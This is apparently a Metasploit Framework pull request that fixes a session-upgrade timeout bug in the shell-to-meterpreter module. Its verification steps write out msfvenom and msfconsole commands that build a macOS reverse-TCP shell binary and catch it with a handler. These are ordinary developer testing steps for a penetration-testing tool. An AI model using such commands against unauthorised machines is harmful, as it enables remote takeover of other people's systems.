### PR TITLE
fix #10576, fix session upgrade HANDLE_TIMEOUT and upgrading osx shells

### DIFF
--- a/lib/msf/base/sessions/command_shell.rb
+++ b/lib/msf/base/sessions/command_shell.rb
@@ -69,6 +69,13 @@ class CommandShell
     "Command shell"
   end
 
+  #
+  # Calls the class method
+  #
+  def type
+    self.class.type
+  end
+
   ##
   # :category: Msf::Session::Provider::SingleCommandShell implementors
   #

--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -265,8 +265,9 @@ class MetasploitModule < Msf::Post
     framework.threads.spawn('ShellToMeterpreterUpgradeCleanup', false) {
       if !aborted
         timer = 0
-        vprint_status("Waiting up to #{HANDLE_TIMEOUT} seconds for the session to come back")
-        while !framework.jobs[listener_job_id].nil? && timer < HANDLE_TIMEOUT
+        timeout = datastore['HANDLE_TIMEOUT']
+        vprint_status("Waiting up to #{timeout} seconds for the session to come back")
+        while !framework.jobs[listener_job_id].nil? && timer < timeout
           sleep(1)
           timer += 1
         end


### PR DESCRIPTION
## Verification

List the steps needed to make sure this thing works

- [x] `msfvenom -p osx/x64/shell_reverse_tcp LHOST=HOST LPORT=4444 -f macho -o osxshell`
- [x] `msfconsole -qx "use exploit/multi/handler; set payload osx/x64/shell_reverse_tcp; set lhost HOST; set lport 4444; set ExitOnSession false; run -j"`
- [x] Execute the macho to get a shell session
- [x] `sessions -u 1` on the session
- [x] **Verify** you get a meterpreter session

I'm still working on why the upgrading of sessions is not working for osx/x64/shell_reverse_tcp, as it seems to work if you upgrade a python shell, python meterpreter, or native meterpreter session on osx.
